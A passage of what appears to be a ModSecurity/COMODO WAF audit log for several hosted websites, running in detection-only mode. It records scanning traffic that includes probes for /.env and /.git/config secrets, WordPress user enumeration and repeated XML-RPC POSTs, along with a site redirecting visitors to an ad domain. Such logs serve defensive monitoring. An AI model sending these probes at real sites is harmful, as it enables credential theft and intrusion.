"/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4P7cH4SeX80EzN5eWSVQAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946349843918 1004216 (- - -) Stopwatch2: 1749946349843918 1004216; combined=2402, p1=427, p2=1594, p3=68, p4=49, p5=164, sr=114, sw=100, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1ab04061-Z-- --7e3c4206-A-- [15/Jun/2025:05:44:03.321532 +0530] aE4QSj9o8tFLnaQ0S_4vUAAAAAQ 42.84.93.0 55272 127.0.0.1 7081 --7e3c4206-B-- GET /robots.txt HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 42.84.93.0 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en User-Agent: okhttp/3.0 Accept-Encoding: gzip, deflate, br Proxy-Connection: close --7e3c4206-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 X-Redirect-By: WordPress Set-Cookie: _sfs_id=91eb60b63ee837a9952555def2aba2af1749946442; expires=Sun, 15 Jun 2025 01:14:02 GMT; Max-Age=3600; path=/; secure; HttpOnly Location: https://advertipros.com/?d1710it3kl6c73dvhf0g Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --7e3c4206-H-- Message: Warning. Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.mindscan.edu.in|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.mindscan.edu.in|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] [hostname "www.mindscan.edu.in"] [uri "/robots.txt"] [unique_id "aE4QSj9o8tFLnaQ0S_4vUAAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946442307168 1014443 (- - -) Stopwatch2: 1749946442307168 1014443; combined=1932, p1=403, p2=1430, p3=0, p4=0, p5=98, sr=123, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7e3c4206-Z-- --a9284729-A-- [15/Jun/2025:05:44:06.103176 +0530] aE4QTcQgjKnP_-nTjoBmUwAAAAM 167.250.235.41 55336 127.0.0.1 7081 --a9284729-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 683 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a9284729-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a9284729-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4QTcQgjKnP_-nTjoBmUwAAAAM"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946445032379 1070862 (- - -) Stopwatch2: 1749946445032379 1070862; combined=2763, p1=498, p2=1894, p3=61, p4=48, p5=165, sr=130, sw=97, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a9284729-Z-- --381f790d-A-- [15/Jun/2025:05:44:11.089764 +0530] aE4QUh6N9C2vdY7GQBUtMQAAAAY 27.158.126.242 58876 127.0.0.1 7081 --381f790d-B-- GET / HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 27.158.126.242 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en User-Agent: okhttp/3.0 Accept-Encoding: gzip, deflate, br Proxy-Connection: close --381f790d-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 X-Redirect-By: WordPress Set-Cookie: _sfs_id=7129fd789ce3a02eb366878a31e8465b1749946450; expires=Sun, 15 Jun 2025 01:14:10 GMT; Max-Age=3600; path=/; secure; HttpOnly Location: https://advertipros.com/?d1710kt109qc73f15efg Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --381f790d-H-- Message: Warning. Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.mindscan.edu.in|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.mindscan.edu.in|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] [hostname "www.mindscan.edu.in"] [uri "/"] [unique_id "aE4QUh6N9C2vdY7GQBUtMQAAAAY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946450322051 767810 (- - -) Stopwatch2: 1749946450322051 767810; combined=2592, p1=441, p2=1976, p3=71, p4=47, p5=57, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --381f790d-Z-- --34056b2b-A-- [15/Jun/2025:05:44:21.970429 +0530] aE4QXWydX8vZg3SgqNzIAQAAAAI 116.208.101.125 36196 127.0.0.1 7081 --34056b2b-B-- GET / HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 116.208.101.125 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en User-Agent: okhttp/3.0 Accept-Encoding: gzip, deflate, br Proxy-Connection: close --34056b2b-F-- HTTP/1.1 302 Found X-Powered-By: PHP/8.3.22 X-Redirect-By: WordPress Set-Cookie: _sfs_id=ee680875c85ecd375f9d07dcebe74ad41749946461; expires=Sun, 15 Jun 2025 01:14:21 GMT; Max-Age=3600; path=/; secure; HttpOnly Location: https://advertipros.com/?d1710nd109qc73f161r0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --34056b2b-H-- Message: Warning. Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.mindscan.edu.in|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.mindscan.edu.in|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] [hostname "www.mindscan.edu.in"] [uri "/"] [unique_id "aE4QXWydX8vZg3SgqNzIAQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946461260971 709533 (- - -) Stopwatch2: 1749946461260971 709533; combined=2076, p1=364, p2=1512, p3=81, p4=51, p5=68, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --34056b2b-Z-- --dfd7205f-A-- [15/Jun/2025:05:44:25.530787 +0530] aE4QXxkoa9Lad8nP7KOBHQAAABA 27.158.126.242 36244 127.0.0.1 7081 --dfd7205f-B-- GET / HTTP/1.0 Host: www.mindscan.edu.in X-Real-IP: 27.158.126.242 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en User-Agent: okhttp/3.0 Accept-Encoding: gzip, deflate, br Proxy-Connection: close --dfd7205f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Link: <https://www.mindscan.edu.in/wp-json/>; rel="https://api.w.org/", <https://www.mindscan.edu.in/wp-json/wp/v2/pages/396>; rel="alternate"; title="JSON"; type="application/json", <https://www.mindscan.edu.in/>; rel=shortlink Set-Cookie: _sfs_id=5e6a2881632464ef9721a9fbe24045251749946464; expires=Sun, 15 Jun 2025 01:14:24 GMT; Max-Age=3600; path=/; secure; HttpOnly Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 18259 Connection: close Content-Type: text/html; charset=UTF-8 --dfd7205f-H-- Message: Warning. Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.mindscan.edu.in|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/Proxy-Connection/" at TX:header_name. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "33"] [id "210740"] [rev "2"] [msg "COMODO WAF: HTTP header is restricted by policy||www.mindscan.edu.in|F|4"] [data "/Proxy-Connection/"] [severity "WARNING"] [tag "CWAF"] [tag "HTTP"] [hostname "www.mindscan.edu.in"] [uri "/"] [unique_id "aE4QXxkoa9Lad8nP7KOBHQAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/mindscan.edu.in/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946463730185 1800686 (- - -) Stopwatch2: 1749946463730185 1800686; combined=27427, p1=354, p2=1704, p3=106, p4=25187, p5=75, sr=107, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --dfd7205f-Z-- --7ebb2455-A-- [15/Jun/2025:05:45:29.055041 +0530] aE4QoPBViRrxRfhQ2snfogAAAAE 196.251.85.177 58998 127.0.0.1 7081 --7ebb2455-B-- GET //wp-json/wp/v2/users/ HTTP/1.0 Host: www.rooferscombine.com X-Real-IP: 196.251.85.177 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 --7ebb2455-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 X-Robots-Tag: noindex Link: <https://www.rooferscombine.com/wp-json/>; rel="https://api.w.org/" X-Content-Type-Options: nosniff Access-Control-Expose-Headers: X-WP-Total, X-WP-TotalPages, Link Access-Control-Allow-Headers: Authorization, X-WP-Nonce, Content-Disposition, Content-MD5, Content-Type X-WP-Total: 1 X-WP-TotalPages: 1 Allow: GET Vary: Origin Connection: close Content-Type: application/json; charset=UTF-8 --7ebb2455-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||www.rooferscombine.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "www.rooferscombine.com"] [uri "/wp-json/wp/v2/users/"] [unique_id "aE4QoPBViRrxRfhQ2snfogAAAAE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/rooferscombine.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946528227485 827644 (- - -) Stopwatch2: 1749946528227485 827644; combined=1717, p1=352, p2=1261, p3=0, p4=0, p5=103, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7ebb2455-Z-- --354e6a1e-A-- [15/Jun/2025:05:45:40.917210 +0530] aE4QqyeXHcLENIHhuFcs7AAAAAU 167.250.235.41 55116 127.0.0.1 7081 --354e6a1e-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 684 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --354e6a1e-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --354e6a1e-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4QqyeXHcLENIHhuFcs7AAAAAU"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946539951832 965444 (- - -) Stopwatch2: 1749946539951832 965444; combined=2439, p1=361, p2=1677, p3=64, p4=47, p5=189, sr=98, sw=101, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --354e6a1e-Z-- --90cf7433-A-- [15/Jun/2025:05:45:48.719774 +0530] aE4Qs1Ioq-7Cj_2-ZLTPYQAAAAA 104.164.104.2 55336 127.0.0.1 7081 --90cf7433-B-- GET /.git/config HTTP/1.0 Host: cstechnew.cstechns.com X-Real-IP: 104.164.104.2 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_4 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/76.0.3809.123 Mobile/15E148 Safari/605.1 Accept-Charset: utf-8 Accept-Encoding: gzip --90cf7433-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.22 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://cstechnew.cstechns.com/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 --90cf7433-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "cstechnew.cstechns.com"] [uri "/.git/config"] [unique_id "aE4Qs1Ioq-7Cj_2-ZLTPYQAAAAA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/cstechnew.cstechns.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946547131032 1588806 (- - -) Stopwatch2: 1749946547131032 1588806; combined=1924, p1=357, p2=1480, p3=0, p4=0, p5=87, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --90cf7433-Z-- --8467f375-A-- [15/Jun/2025:05:46:36.464218 +0530] aE4Q5GydX8vZg3SgqNzIKAAAAAI 143.198.155.199 52392 127.0.0.1 7081 --8467f375-B-- GET /.env HTTP/1.0 Host: shows.tandonamit.com X-Real-IP: 143.198.155.199 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.5.27 Accept-Charset: utf-8 Accept-Encoding: gzip --8467f375-F-- HTTP/1.1 404 Not Found link: </_next/static/media/be4dbde7f10bc465-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: no-store, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --8467f375-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "shows.tandonamit.com"] [uri "/.env"] [unique_id "aE4Q5GydX8vZg3SgqNzIKAAAAAI"] Stopwatch: 1749946596431156 33143 (- - -) Stopwatch2: 1749946596431156 33143; combined=2337, p1=675, p2=1453, p3=59, p4=58, p5=91, sr=97, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8467f375-Z-- --4ce38773-A-- [15/Jun/2025:05:46:37.198607 +0530] aE4Q5B6N9C2vdY7GQBUtXwAAAAY 143.198.155.199 52400 127.0.0.1 7081 --4ce38773-B-- GET /.env HTTP/1.0 Host: showsadmin.tandonamit.com X-Real-IP: 143.198.155.199 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0 Accept-Charset: utf-8 Accept-Encoding: gzip --4ce38773-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a34f9d1faa5f3315-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Accept-Encoding Content-Encoding: gzip Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --4ce38773-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "showsadmin.tandonamit.com"] [uri "/.env"] [unique_id "aE4Q5B6N9C2vdY7GQBUtXwAAAAY"] Stopwatch: 1749946596431805 766871 (- - -) Stopwatch2: 1749946596431805 766871; combined=1851, p1=469, p2=1201, p3=50, p4=53, p5=77, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --4ce38773-Z-- --454a0144-A-- [15/Jun/2025:05:47:20.618064 +0530] aE4RD2ydX8vZg3SgqNzIOgAAAAI 167.250.235.41 33188 127.0.0.1 7081 --454a0144-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 681 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --454a0144-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --454a0144-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4RD2ydX8vZg3SgqNzIOgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946639647799 970357 (- - -) Stopwatch2: 1749946639647799 970357; combined=2578, p1=487, p2=1703, p3=59, p4=47, p5=176, sr=179, sw=106, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --454a0144-Z-- --a17ebe58-A-- [15/Jun/2025:05:49:06.675274 +0530] aE4ReRkoa9Lad8nP7KOBfAAAABA 167.250.235.41 53230 127.0.0.1 7081 --a17ebe58-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --a17ebe58-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --a17ebe58-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] [hostname "best-website-designs.com"] [uri "/xmlrpc.php"] [unique_id "aE4ReRkoa9Lad8nP7KOBfAAAABA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/best-website-designs.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1749946745701297 974041 (- - -) Stopwatch2: 1749946745701297 974041; combined=2336, p1=377, p2=1553, p3=72, p4=50, p5=174, sr=100, sw=110, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --a17ebe58-Z-- --1cd2710a-A-- [15/Jun/2025:05:50:40.336663 +0530] aE4R1xkoa9Lad8nP7KOBnAAAABA 167.250.235.41 44276 127.0.0.1 7081 --1cd2710a-B-- POST /xmlrpc.php HTTP/1.0 Host: best-website-designs.com X-Real-IP: 167.250.235.41 X-Accel-Internal: /internal-nginx-static-location Connection: close Content-Length: 679 Content-Type: text/xml; charset=utf-8 Accept: */* Accept-Language: pt-BR,pt;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 --1cd2710a-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.3.22 Connection: close Vary: Accept-Encoding Content-Type: text/xml; charset=UTF-8 --1cd2710a-H-- Message: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last alert)|best-website-designs.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Operator EQ matched 0 at IP. [file "/etc/apache2/modsecurity.d/rules/comodo_free/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 167.250.235.41 (0+1 hits since last 